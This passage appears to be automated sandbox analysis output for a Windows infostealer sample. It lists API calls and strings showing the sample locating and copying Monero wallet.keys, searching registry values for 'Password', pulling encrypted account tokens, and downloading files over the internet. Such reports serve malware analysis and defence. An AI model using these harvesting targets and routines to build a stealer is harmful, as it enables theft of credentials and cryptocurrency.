                                  • Part of subcall function 004F12A0: RtlAllocateHeap.NTDLL(00000000), ref: 004F12BB
                                  • Part of subcall function 004F12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004F12D7
                                  • Part of subcall function 004F12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004F12F5
                                  • Part of subcall function 004F12A0: RegCloseKey.ADVAPI32(?), ref: 004F12FF
                                • lstrcat.KERNEL32(?,00000000), ref: 004F134F
                                • lstrlen.KERNEL32(?), ref: 004F135C
                                • lstrcat.KERNEL32(?,.keys), ref: 004F1377
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 00508B60: GetSystemTime.KERNEL32(00510E1A,012D9AC8,005105AE,?,?,004F13F9,?,0000001A,00510E1A,00000000,?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 00508B86
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004F1465
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F99EC
                                  • Part of subcall function 004F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004F9A11
                                  • Part of subcall function 004F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004F9A31
                                  • Part of subcall function 004F99C0: ReadFile.KERNEL32(000000FF,?,00000000,004F148F,00000000), ref: 004F9A5A
                                  • Part of subcall function 004F99C0: LocalFree.KERNEL32(004F148F), ref: 004F9A90
                                  • Part of subcall function 004F99C0: CloseHandle.KERNEL32(000000FF), ref: 004F9A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 004F14EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: d42aefed3f8d5e45208df13ce418e1e1c7af112c2bfd493b9b3877ac09742873
                                • Instruction ID: 91850d60e41d87c4f02ee8f01c75bdc4950204f0bea1d3be1c6c3ece842d95a9
                                • Opcode Fuzzy Hash: d42aefed3f8d5e45208df13ce418e1e1c7af112c2bfd493b9b3877ac09742873
                                • Instruction Fuzzy Hash: 0C5162B195021997DB15EB60DD96FED773CBF90300F408198B60A620D1EE345B89CFA6
                                Function 004F75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004F72D0: memset.MSVCRT ref: 004F7314
                                  • Part of subcall function 004F72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004F733A
                                  • Part of subcall function 004F72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004F73B1
                                  • Part of subcall function 004F72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004F740D
                                  • Part of subcall function 004F72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 004F7452
                                  • Part of subcall function 004F72D0: HeapFree.KERNEL32(00000000), ref: 004F7459
                                • lstrcat.KERNEL32(00000000,005117FC), ref: 004F7606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F7648
                                • lstrcat.KERNEL32(00000000, : ), ref: 004F765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F768F
                                • lstrcat.KERNEL32(00000000,00511804), ref: 004F76A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F76D3
                                • lstrcat.KERNEL32(00000000,00511808), ref: 004F76ED
                                • task.LIBCPMTD ref: 004F76FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: :
                                • API String ID: 3191641157-3653984579
                                • Opcode ID: 95d4d351cec6b1690290c82f160525363cda0715650a1da45e7bca62a8eaf457
                                • Instruction ID: cbac654f36daeaae8f99e3961a3050225a31cfa3c22b761210d021ba1b526766
                                • Opcode Fuzzy Hash: 95d4d351cec6b1690290c82f160525363cda0715650a1da45e7bca62a8eaf457
                                • Instruction Fuzzy Hash: E4315E71900109EFEB05EBB4DC86DFF7778BB44306B14811DF202A72A0DA3CA946CB5A
                                Function 004F72D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004F7314
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004F733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004F73B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004F740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004F7452
                                • HeapFree.KERNEL32(00000000), ref: 004F7459
                                • task.LIBCPMTD ref: 004F7555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: Password
                                • API String ID: 2808661185-3434357891
                                • Opcode ID: f8af55e4fbd8b9192894ecc493644465d518eb272f5fa56a6660beeed2c3ca8e
                                • Instruction ID: 771e27f2de0de81b381d4c30dd8536589dabf1bcffb8ac7fd034617b51bb499e
                                • Opcode Fuzzy Hash: f8af55e4fbd8b9192894ecc493644465d518eb272f5fa56a6660beeed2c3ca8e
                                • Instruction Fuzzy Hash: C4612DB590416C9BDB24DB50CC45BEAB7B8BF44304F0081EAE689A6181DF785FC9CF95
                                Function 00508100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,012DD800,00000000,?,00510E2C,00000000,?,00000000), ref: 00508130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00508137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00508158
                                • __aulldiv.LIBCMT ref: 00508172
                                • __aulldiv.LIBCMT ref: 00508180
                                • wsprintfA.USER32 ref: 005081AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: 0cf84fe89201dac4a6d889ef44f5d2b9356f99571822cd183f5e61b6d4a518f0
                                • Instruction ID: a4763e02ce47656cea698d260372a89547865ac741c23003df6c2147749da9b1
                                • Opcode Fuzzy Hash: 0cf84fe89201dac4a6d889ef44f5d2b9356f99571822cd183f5e61b6d4a518f0
                                • Instruction Fuzzy Hash: 03214FB1E44209ABEB00DFD4DC4AFAEBB78FB44710F104509F605BB2C0C77859018BA5
                                Function 004F60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004F4839
                                  • Part of subcall function 004F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004F4849
                                • InternetOpenA.WININET(00510DF7,00000001,00000000,00000000,00000000), ref: 004F610F
                                • StrCmpCA.SHLWAPI(?,012DE250), ref: 004F6147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004F618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004F61B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 004F61DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004F620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 004F6249
                                • InternetCloseHandle.WININET(?), ref: 004F6253
                                • InternetCloseHandle.WININET(00000000), ref: 004F6260
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: fb04d4db6778a419b73fdc289d16acda3b8ca2561cd03506223b250ed7355eda
                                • Instruction ID: 314224634bd193336dc9c2b81fb1575dbeda2600134abfd065aa3f61922e5f73
                                • Opcode Fuzzy Hash: fb04d4db6778a419b73fdc289d16acda3b8ca2561cd03506223b250ed7355eda
                                • Instruction Fuzzy Hash: 6F51737190021CABEB20DF50DD4ABEE77B8FB44701F108099B745A71C1DB786A85CF9A
                                Function 004FBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                • lstrlen.KERNEL32(00000000), ref: 004FBC9F
                                  • Part of subcall function 00508E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00508E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 004FBCCD
                                • lstrlen.KERNEL32(00000000), ref: 004FBDA5
                                • lstrlen.KERNEL32(00000000), ref: 004FBDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 90c044207d3dc4ba7471d8c792b717ab712b91cb7a0ed24faebd787e7bdbe09d
                                • Instruction ID: 9f9ee5a131d23718cbcd3883e3a82be90f9a5f3ceb6ce190fd108d3acbdea86b
                                • Opcode Fuzzy Hash: 90c044207d3dc4ba7471d8c792b717ab712b91cb7a0ed24faebd787e7bdbe09d
                                • Instruction Fuzzy Hash: 63B11771910209ABDB04FBA0DD5AEEE7B3CBF94300F408559F507A61D1EF346A49CBA6
                                Function 00506770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 5773b925f38f0ea219073393d75b6596a8f303faa790c67175db13187bfcf6d8
                                • Instruction ID: 3b25880f2a4bb3152b044906734e031d7a295b81f6568d22c39a7ac47761330e
                                • Opcode Fuzzy Hash: 5773b925f38f0ea219073393d75b6596a8f303faa790c67175db13187bfcf6d8
                                • Instruction Fuzzy Hash: 15F0823090520AFFE3449FE0E94A76C7B70FB04703F048198F649862D0D6784B51DB9A
                                Function 004F4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004F4FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F4FD1
                                • InternetOpenA.WININET(00510DDF,00000000,00000000,00000000,00000000), ref: 004F4FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 004F5011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 004F5041
                                • InternetCloseHandle.WININET(?), ref: 004F50B9
                                • InternetCloseHandle.WININET(?), ref: 004F50C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 0c1c69ec0e77308a4c8fb735f790a53faa94c9cd4d862bec7c5dad39f37ae44b
                                • Instruction ID: d6a9cadc63fff24144ef9a3e63aefa45a62cbd09571de04a4a26fc2f05fd1ac7
                                • Opcode Fuzzy Hash: 0c1c69ec0e77308a4c8fb735f790a53faa94c9cd4d862bec7c5dad39f37ae44b
                                • Instruction Fuzzy Hash: DA31E4B4A00218ABDB20CF54DC89BDDB7B4FB48705F1081D9EB49A7281DB746AC58F9D
                                Function 005083DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00508426
                                • wsprintfA.USER32 ref: 00508459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0050847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0050848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00508499
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,012DD968,00000000,000F003F,?,00000400), ref: 005084EC
                                • lstrlen.KERNEL32(?), ref: 00508501
                                • RegQueryValueExA.ADVAPI32(00000000,012DDAA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00510B34), ref: 00508599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00508608
                                • RegCloseKey.ADVAPI32(00000000), ref: 0050861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
